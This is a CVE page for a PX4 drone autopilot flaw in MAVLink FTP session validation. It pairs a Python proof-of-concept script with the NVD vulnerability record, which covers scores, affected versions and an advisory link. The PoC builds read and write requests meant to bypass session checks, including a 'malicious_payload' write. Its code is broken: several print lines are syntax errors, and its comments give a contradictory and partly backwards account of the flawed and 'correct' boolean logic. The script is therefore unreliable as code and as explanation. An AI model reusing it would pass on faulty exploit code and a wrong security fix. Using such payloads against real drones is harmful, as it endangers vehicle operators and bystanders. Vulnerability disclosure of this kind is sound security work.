CVE-2026-32713

#!/usr/bin/env python3 """ CVE-2026-32713 PoC - PX4 Autopilot MAVLink FTP Session Validation Bypass This PoC demonstrates the logic error in session validation using incorrect boolean logic (&& instead of ||). """ import struct # MAVLink FTP Message IDs MAVLINK_MSG_ID_FILE_TRANSFER_SESSION = 0 FILE_READ_OPERATION = 0 FILE_WRITE_OPERATION = 1 OPEN_FILE_SESSION = 0 def create_mavlink_ftp_message(opcode, session, offset, data=b''): """Create a MAVLink FTP message with specified parameters.""" # MAVLink FTP Message Structure target_system = 1 target_component = 100 seq_number = 1 session_id = session opcode_cmd = opcode size = len(data) req_opcode = 0 burst_packet_index = 0 padding = 0 # The vulnerability is in the session validation logic # Incorrect: if (session != 0 && fd != -1) - requires BOTH to be valid # Correct: if (session != 0 || fd != -1) - requires EITHER to be valid payload = struct.pack('<BBBBBBBHH', target_system, target_component, seq_number, session_id, opcode_cmd, size, req_opcode, burst_packet_index, offset) payload += data.ljust(251, b'\x00') return payload def exploit_session_bypass(): """ Exploit the session validation logic error. With incorrect && logic, if session=0 but fd is valid, validation passes. With correct || logic, either session or fd must be valid. """ print("["]", "CVE-2026-32713 - PX4 MAVLink FTP Session Bypass") print("["]", "Testing invalid session handling...") # Scenario 1: Try to read with invalid session (session=0) msg = create_mavlink_ftp_message( opcode=FILE_READ_OPERATION, session=0, # Invalid session offset=0, data=b'' ) print("[+] Created BurstReadFile request with invalid session") print(f"[+] Payload length: {len(msg)} bytes") # Scenario 2: Try to write with closed file descriptor msg = create_mavlink_ftp_message( opcode=FILE_WRITE_OPERATION, session=1, # Valid session offset=0, data=b'malicious_payload' ) print("[+] Created WriteFile request for exploitation") print("[!]", "Vulnerable condition: session validation uses && instead of ||") print("[!]", "This allows operations to proceed with invalid sessions/fd") return True if __name__ == "__main__": exploit_session_bypass()

{"cve": {"id": "CVE-2026-32713", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:42.313", "lastModified": "2026-03-16T19:00:42.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, A logic error in the PX4 Autopilot MAVLink FTP session validation uses incorrect boolean logic (&& instead of ||), allowing BurstReadFile and WriteFile operations to proceed with invalid sessions or closed file descriptors. This enables an unauthenticated attacker to put the FTP subsystem into an inconsistent state, trigger operations on invalid file descriptors, and bypass session isolation checks. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, un error de lógica en la validación de sesión FTP MAVLink del piloto automático PX4 utiliza lógica booleana incorrecta (&amp;&amp; en lugar de ||), permitiendo que las operaciones BurstReadFile y WriteFile procedan con sesiones inválidas o descriptores de archivo cerrados. Esto permite a un atacante no autenticado poner el subsistema FTP en un estado inconsistente, activar operaciones en descriptores de archivo inválidos y eludir las comprobaciones de aislamiento de sesión. Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-670"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-pp2c-jr5g-6f2m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}